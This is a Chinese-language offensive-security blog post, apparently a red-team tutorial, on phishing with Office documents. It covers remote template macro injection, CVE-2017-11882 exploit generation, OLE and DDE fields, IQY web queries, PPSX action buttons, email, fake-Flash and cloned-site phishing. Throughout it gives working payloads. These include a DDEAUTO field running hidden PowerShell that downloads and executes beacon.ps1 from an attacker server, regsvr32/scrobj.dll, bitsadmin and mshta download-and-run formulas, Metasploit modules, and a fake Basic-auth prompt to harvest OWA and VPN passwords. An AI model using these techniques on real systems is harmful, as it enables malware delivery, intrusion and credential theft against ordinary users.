Office宏攻击及免杀
https://skewwg.github.io/2020/12/05/diao-yu-yu-she-gong-xi-lie-zhi-office-hong/
2.4 远程模板注入宏代码
利用Word文档加载附加模板时的缺陷所发起的恶意请求,而达到的攻击目的,所以当目标用户点开攻击者发送的恶意Word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。
发送的文档本身不带恶意代码,所以能过很多静态检测。只需要在远程DOTM文档中编写宏病毒或者木马即可。
思路:
编写一个带有宏代码的DOTM文档,上传服务器
编写一个能够远程连接的DOCX文档
将该文档压缩找到并更改settings.xml.rels文件中的内容,将其中的target内容修改为服务器上DOTM文档的URL
将DOCX解压后的内容再以存储模式压缩为ZIP
修改后缀名为DOCX,打开后即可实现远程注入宏文档
按照上述Word宏钓鱼方法制作,保存时保存类型为 dotm , fish.dotm,
开启Web服务,放在其目录下,
http://192.168.2.148:8000/hello.doc
制作 docx
直接下载份简历
将下载的简历文件后缀 docx 改为 zip,解压.
将 target 内容改为[http://192.168.2.148:8000/hello.doc](http://192.168.2.148:8000/hello.doc),之后
全选目录所有文件,邮件压缩问 yanmie.zip。
之后再把zip 后缀改为 docx即可。
靶机打开,启用宏,可上线。
2.5 CVE-2017-11882
适用于:
MicrosoftOffice 2000MicrosoftOffice 2003MicrosoftOffice 2007 Service Pack 3MicrosoftOffice 2010 Service Pack 2MicrosoftOffice 2013 Service Pack 1MicrosoftOffice 2016MicrosoftOffice 365
Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。
这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容,比如说在一个 word 文档里引用了另一个 excel 表格里的某项内容,通过连接域 (Field) 的方式可以实现在 excel 里更新内容后 word 中同步更新的效果,问题出在这个域的内容可以是一个公式 (或者说表达式),这个公式并不限制内容。
GitHub:
https://github.com/Ridter/CVE-2017-11882
使用:
python Command109b_CVE-2017-11882.py -c”cmd.exe /c calc.exe”-otest.doc
生成 test.doc 文档,靶机打开。成功弹出加算器
msf 复现。
项目
https://github.com/0x09AL/CVE-2017-11882-metasploitexploit/windows/fileformat/office_ms17_11882
有点不稳,老是上线不了
配合 HTA上线
exploit/windows/misc/hta_serverhttp://192.168.2.148:8080/IbsbCdtZ.ht
靶机打开test2.doc直接上线
2.5 word 中插入外部对象(OLE)方式欺骗
改变题注,更加逼真
双击,选择确定,即可上线。
2.6 构造DDE钓鱼文档
创建一个文档 dde.docx ,之后双击打开 dde.docx,直接Ctrl f9快捷键便可以快速帮助创建一个域,我们则只需要在花括号中添加如下指令(弹出一个计算器),实战过程中可以远程加载我们的木马。
DDEAUTOc:\\windows\\system32\\cmd.exe”\/k calc.exe”
成功弹出计算器。
这里用ps远程下载马。
输入
DDEAUTO”C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString(‘http://192.168.2.148:8000/beacon.ps1’); # “”Microsoft Document Security Add-On”
2.7 IQY特性钓鱼
利用nishang下的Out-WebQuery.ps1, 脚本生成包含恶意 payload url 的 iqy 文件。
可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用excel制作钓鱼邮件的机会,假如你要引入的web数据是入侵者事先准备好的一段payload iqy恶意代码,那结果就不言而喻了。
利用过程:
接下来利用IYQ打开计算机来看看效果
在我们自己的服务器的网站目录下放一个payload.html文件,内容是IYQ代码
=cmd|’/c calc.exe ‘!A0
接下来就是按照之前的方法,来拉取我们自己服务器上的payload文件
导入
将文件保存,放在靶机打开
其他方式
regsv***=cmd|’/c regsv*** /s /n /u /i:http://ip/D4zv0M.sct scrobj.dll ‘!A0bitsadmin=cmd|’/c bitsadmin /transfer e822 http://ip/iqy %APPDATA%\e822.exe&%APPDATA%\e822.exe&del %APPDATA%\e822.exe ‘!A0mshta=cmd|’/c mshta http://ip/iqy.hta ‘!A0
接下来进行弹shell操作
用到的工具:
nishang:https://github.com/samratashok/nishang/releases
先在kali准备好payload:
exploit/multi/script/web_delivery
用nishang中提供好的Out-WebQuery脚本来生成iqy文件
iqy文件本身的内容很简单,只有一个包含恶意payload的url:http://192.168.2.148/msf.html,关键也就在这个 html,我们需要把 html 的内容换成加载我们上面准备好的 meterpreter payload 的 iqy 语句 :regsv* /s /n /u /i:http://192.168.2.148:8080/ZTPzcY6J5.sctscrobj.dll
然后利用nishang-master\Client\Out-WebQuery.ps1,生成文件
powershell-execbypass-Command”& {Import-Module “.\Out-WebQuery.ps1″;Out-WebQuery -URL http://192.168.2.148:8000/msf.html}”
命令成功执行后,会生成一个iqy文件
接下来,打开Web服务目录,创建msf.html,内容为刚刚msf生成的paylaod
=cmd|’/c regsv*** /s /n /u /i:http://192.168.2.148:8080/ZTPzcY6J5.sct scrobj.dll ‘!A0
接下来就可以想办法把之前生成的iqy文件发送给受害者。
因为前面的iqy文件是用cmd执行的,所以会继续询问是否启动另一个应用程序,CMD.EXE.
借助IQY窃取目标用户密码
powershell-execbypass-Command”& {Import-Module “.\Out-WebQuery.ps1”;Out-WebQuery -URL http://192.168.2.1}”powershell-execbypasscd.\UtilityImport-Module.\Start-CaptureServer.ps1Start-CaptureServer-AuthTypeBasic-IPAddress192.168..2.1-LogFilePathC:\windows\temp\log.txt# 注意此处的认证要选择基础认证,监听的 ip 和上面生成 iqy 文件中的 ip 一致,通常都是本机 i
之后把上一步生成的 IQY文件发给靶机,打开
此认证窗口会连续出现三次,相信三次里面总有一个能用的账号密码,因为目标可能也压根搞不清楚这是什么东西,以为是系统的账号密码,就随便输,其实我们主要还是想利用这种方式钓到可用的 owa 或者 v*n 账号密码
2.8 PPT 动作按钮特性构造 PPSX钓鱼
新型PPT钓鱼攻击分析
首先,创建一个普通的PPTX文件,随便填入一些内容,如下图:
这里要选择空白的那个,选择以后,在页面中拉出一个触发位置,之后会弹出动作设置的界面,选择鼠标悬停-→ 运行程序
msiexec.exe,系统进程,是Windows Installer的一部分,利用此进程来加载我们shellcode可以达到一定的规避作用。
2.9 超链接
在PDF、Office文档中内嵌一个跳转链接是很早期的钓鱼方式,通过文字信息的引导,让受害者点开页面,如果缺乏戒心,就可能会获取到受害者的账号、密码、银行卡、身份证等信息。
三、邮件钓鱼
邮件服务器相关环境搭建,邮件信息收集请见
https://www.freebuf.com/articles/web/260391.html
涵盖伪造(SRC假漏洞、简历、宏文档、合作利诱、技术交流、钓鱼网站、第三方平台)、伪造发件人、office 宏钓鱼、exe引诱。
四、flash钓鱼
选择域名:http://www.f1ash.cn/
源码:https://github.com/r00tSe7en/Fake-flash.cn
自解压或者捆绑 配合 xss .
详细步骤见 1.6 .
五、网站钓鱼
制作钓鱼网站,克隆网站
cs,msf都有这个功能
setoolkit
推荐阅读:
干货 | Office文档钓鱼之如何快速进行宏免杀
实战 | 钓鱼与社工系列之office宏